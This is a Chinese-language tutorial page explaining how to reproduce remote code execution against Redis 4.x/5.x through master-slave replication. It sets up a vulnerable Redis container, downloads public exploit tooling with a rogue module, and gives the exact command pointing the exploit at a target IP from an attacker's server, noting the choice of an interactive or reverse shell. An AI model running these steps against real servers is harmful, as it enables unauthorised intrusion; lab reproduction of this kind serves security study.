溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)

發(fā)布時(shí)間:2022-01-15 15:36:42 來源:億速云 閱讀:124 作者:iii 欄目:大數(shù)據(jù)

這篇文章主要講解了“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”,文中的講解內(nèi)容簡單清晰,易于學(xué)習(xí)與理解,下面請大家跟著小編的思路慢慢深入,一起來研究和學(xué)習(xí)“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”吧!

首先拉取一個(gè)5.0鏡像

docker search redis5.0    //查找鏡像docker pull damonevking/redis5.0   //拉取下圖第三個(gè)鏡像

Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)

0x02 運(yùn)行環(huán)境

運(yùn)行容器

docker run -p 6379:6379 -d damonevking/redis5.0 redis-server   //映射端口并運(yùn)行容器

訪問你的ip+6379端口,如下圖則說明搭建成功

Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)

0x03 漏洞利用

git clone https://github.com/Ridter/redis-rce.git   //下載漏洞利用腳本

注意,這里少一個(gè).so的文件,到https://github.com/n0b0dyCN/redis-rogue-server下載并放到和redis-rce.py同一目錄下,然后執(zhí)行如下命令:

python3 redis-rce.py -r 136.244.70.243(目標(biāo)ip) -L 136.244.70.243(自己的vps) -f exp.so   //ip就不打碼了,師傅們不要搞我

需要注意,這里的-r后面是目標(biāo)的ip,而-L后面則是你執(zhí)行腳本的vps的ip

Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)

在此處:i為交互式shell,r為反彈shell,根據(jù)自己的需要選擇就可以了

Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)

感謝各位的閱讀,以上就是“Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)”的內(nèi)容了,經(jīng)過本文的學(xué)習(xí)后,相信大家對(duì)Redis基于主從復(fù)制的RCE 4.x/5.x怎么實(shí)現(xiàn)這一問題有了更深刻的體會(huì),具體使用情況還需要大家實(shí)踐驗(yàn)證。這里是億速云,小編將為大家推送更多相關(guān)知識(shí)點(diǎn)的文章,歡迎關(guān)注!

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI